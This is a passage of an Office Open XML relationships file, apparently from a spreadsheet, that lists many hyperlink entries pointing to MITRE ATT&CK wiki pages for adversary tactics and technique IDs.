Target="https://attack.mitre.org/wiki/Defense_Evasion" TargetMode="External"/><Relationship Id="rId245" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Discovery" TargetMode="External"/><Relationship Id="rId266" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1120" TargetMode="External"/><Relationship Id="rId287" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Discovery" TargetMode="External"/><Relationship Id="rId410" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Initial_Access" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1131" TargetMode="External"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Command_and_Control" TargetMode="External"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1189" TargetMode="External"/><Relationship Id="rId147" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Execution" TargetMode="External"/><Relationship Id="rId168" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Persistence" TargetMode="External"/><Relationship Id="rId312" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Credential_Access" TargetMode="External"/><Relationship Id="rId333" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Persistence" TargetMode="External"/><Relationship Id="rId354" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Defense_Evasion" TargetMode="External"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Privilege_Escalation" TargetMode="External"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Persistence" TargetMode="External"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Defense_Evasion" TargetMode="External"/><Relationship Id="rId189" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Persistence" TargetMode="External"/><Relationship Id="rId375" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Discovery" TargetMode="External"/><Relationship Id="rId396" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Defense_Evasion" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Property:Has_ID" TargetMode="External"/><Relationship Id="rId214" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1037" TargetMode="External"/><Relationship Id="rId235" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Command_and_Control" TargetMode="External"/><Relationship Id="rId256" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Lateral_Movement" TargetMode="External"/><Relationship Id="rId277" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1057" TargetMode="External"/><Relationship Id="rId298" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Execution" TargetMode="External"/><Relationship Id="rId400" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1111" TargetMode="External"/><Relationship Id="rId421" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1047" TargetMode="External"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1025" TargetMode="External"/><Relationship Id="rId137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Exfiltration" TargetMode="External"/><Relationship Id="rId158" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1181" TargetMode="External"/><Relationship Id="rId302" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Lateral_Movement" TargetMode="External"/><Relationship Id="rId323" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Persistence" TargetMode="External"/><Relationship Id="rId344" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Persistence" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Privilege_Escalation" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1067" TargetMode="External"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Execution" TargetMode="External"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Credential_Access" TargetMode="External"/><Relationship Id="rId179" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Defense_Evasion" TargetMode="External"/><Relationship Id="rId365" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Command_and_Control" TargetMode="External"/><Relationship Id="rId386" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1080" TargetMode="External"/><Relationship Id="rId190" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Privilege_Escalation" TargetMode="External"/><Relationship Id="rId204" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1118" TargetMode="External"/><Relationship Id="rId225" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1170" TargetMode="External"/><Relationship Id="rId246" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1040" TargetMode="External"/><Relationship Id="rId267" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Discovery" TargetMode="External"/><Relationship Id="rId288" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1108" TargetMode="External"/><Relationship Id="rId411" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1125" TargetMode="External"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1074" TargetMode="External"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Initial_Access" TargetMode="External"/><Relationship Id="rId313" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Initial_Access" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Privilege_Escalation" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Persistence" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1191" TargetMode="External"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1090" TargetMode="External"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Persistence" TargetMode="External"/><Relationship Id="rId148" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1212" TargetMode="External"/><Relationship Id="rId169" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Privilege_Escalation" TargetMode="External"/><Relationship Id="rId334" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1064" TargetMode="External"/><Relationship Id="rId355" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Execution" TargetMode="External"/><Relationship Id="rId376" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1016" TargetMode="External"/><Relationship Id="rId397" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Execution" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Property:Has_technical_description" TargetMode="External"/><Relationship Id="rId180" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Persistence" TargetMode="External"/><Relationship Id="rId215" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Lateral_Movement" TargetMode="External"/><Relationship Id="rId236" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1096" TargetMode="External"/><Relationship Id="rId257" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1097" TargetMode="External"/><Relationship Id="rId278" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Discovery" TargetMode="External"/><Relationship Id="rId401" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Credential_Access" TargetMode="External"/><Relationship Id="rId422" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Execution" TargetMode="External"/><Relationship Id="rId303" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1105" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Persistence" TargetMode="External"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1214" TargetMode="External"/><Relationship Id="rId138" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1041" TargetMode="External"/><Relationship Id="rId345" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Privilege_Escalation" TargetMode="External"/><Relationship Id="rId387" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Lateral_Movement" TargetMode="External"/><Relationship Id="rId191" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1054" TargetMode="External"/><Relationship Id="rId205" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Defense_Evasion" TargetMode="External"/><Relationship Id="rId247" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Credential_Access" TargetMode="External"/><Relationship Id="rId412" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Collection" TargetMode="External"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Collection" TargetMode="External"/><Relationship Id="rId289" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Defense_Evasion" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1087" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Defense_Evasion" TargetMode="External"/><Relationship Id="rId149" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Credential_Access" TargetMode="External"/><Relationship Id="rId314" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1014" TargetMode="External"/><Relationship Id="rId356" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1045" TargetMode="External"/><Relationship Id="rId398" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1199" TargetMode="External"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Privilege_Escalation" TargetMode="External"/><Relationship Id="rId160" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Privilege_Escalation" TargetMode="External"/><Relationship Id="rId216" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Persistence" TargetMode="External"/><Relationship Id="rId423" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1084" TargetMode="External"/><Relationship Id="rId258" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Lateral_Movement" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Lateral_Movement" TargetMode="External"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Command_and_Control" TargetMode="External"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1140" TargetMode="External"/><Relationship Id="rId325" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Execution" TargetMode="External"/><Relationship Id="rId367" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Command_and_Control" TargetMode="External"/><Relationship Id="rId171" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Discovery" TargetMode="External"/><Relationship Id="rId227" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Execution" TargetMode="External"/><Relationship Id="rId269" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Discovery" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Collection" TargetMode="External"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Execution" TargetMode="External"/><Relationship Id="rId280" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Defense_Evasion" TargetMode="External"/><Relationship Id="rId336" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Execution" TargetMode="External"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1196" TargetMode="External"/><Relationship Id="rId140" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1011" TargetMode="External"/><Relationship Id="rId182" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Credential_Access" TargetMode="External"/><Relationship Id="rId378" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1049" TargetMode="External"/><Relationship Id="rId403" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Command_and_Control" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Defense_Evasion" TargetMode="External"/><Relationship Id="rId238" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1128" TargetMode="External"/><Relationship Id="rId291" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1060" TargetMode="External"/><Relationship Id="rId305" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Lateral_Movement" TargetMode="External"/><Relationship Id="rId347" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Lateral_Movement" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Discovery" TargetMode="External"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1094" TargetMode="External"/><Relationship Id="rId151" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Defense_Evasion" TargetMode="External"/><Relationship Id="rId389" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Execution" TargetMode="External"/><Relationship Id="rId193" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1066" TargetMode="External"/><Relationship Id="rId207" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1208" TargetMode="External"/><Relationship Id="rId249" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Persistence" TargetMode="External"/><Relationship Id="rId414" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Command_and_Control" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1098" TargetMode="External"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Exfiltration" TargetMode="External"/><Relationship Id="rId260" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Credential_Access" TargetMode="External"/><Relationship Id="rId316" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1085" TargetMode="External"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1042" TargetMode="External"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Defense_Evasion" TargetMode="External"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1089" TargetMode="External"/><Relationship Id="rId358" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1193" TargetMode="External"/><Relationship Id="rId162" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Command_and_Control" TargetMode="External"/><Relationship Id="rId218" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Collection" TargetMode="External"/><Relationship Id="rId425" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1028" TargetMode="External"/><Relationship Id="rId271" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Persistence" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Persistence" TargetMode="External"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Command_and_Control" TargetMode="External"/><Relationship Id="rId131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Collection" TargetMode="External"/><Relationship Id="rId327" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Privilege_Escalation" TargetMode="External"/><Relationship Id="rId369" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Command_and_Control" TargetMode="External"/><Relationship Id="rId173" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Credential_Access" TargetMode="External"/><Relationship Id="rId229" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Command_and_Control" TargetMode="External"/><Relationship Id="rId380" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1033" TargetMode="External"/><Relationship Id="rId240" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1046" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Exfiltration" TargetMode="External"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Execution" TargetMode="External"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1132" TargetMode="External"/><Relationship Id="rId282" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Defense_Evasion" TargetMode="External"/><Relationship Id="rId338" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Discovery" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1015" TargetMode="External"/><Relationship Id="rId142" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1052" TargetMode="External"/><Relationship Id="rId184" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Privilege_Escalation" TargetMode="External"/><Relationship Id="rId391" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1209" TargetMode="External"/><Relationship Id="rId405" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Execution" TargetMode="External"/><Relationship Id="rId251" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1027" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Persistence" TargetMode="External"/><Relationship Id="rId293" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1121" TargetMode="External"/><Relationship Id="rId307" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Lateral_Movement" TargetMode="External"/><Relationship Id="rId349" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Persistence" TargetMode="External"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1024" TargetMode="External"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Collection" TargetMode="External"/><Relationship Id="rId153" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Privilege_Escalation" TargetMode="External"/><Relationship Id="rId195" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1070" TargetMode="External"/><Relationship Id="rId209" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1171" TargetMode="External"/><Relationship Id="rId360" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1192" TargetMode="External"/><Relationship Id="rId416" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1100" TargetMode="External"/><Relationship Id="rId220" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Defense_Evasion" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1182" TargetMode="External"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1115" TargetMode="External"/><Relationship Id="rId262" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Discovery" TargetMode="External"/><Relationship Id="rId318" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Execution" TargetMode="External"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Exfiltration" TargetMode="External"/><Relationship Id="rId122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1175" TargetMode="External"/><Relationship Id="rId164" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Defense_Evasion" TargetMode="External"/><Relationship Id="rId371" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Initial_Access" TargetMode="External"/><Relationship Id="rId427" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Lateral_Movement" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1010" TargetMode="External"/><Relationship Id="rId231" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Command_and_Control" TargetMode="External"/><Relationship Id="rId273" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1086" TargetMode="External"/><Relationship Id="rId329" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Exfiltration" TargetMode="External"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Defense_Evasion" TargetMode="External"/><Relationship Id="rId133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 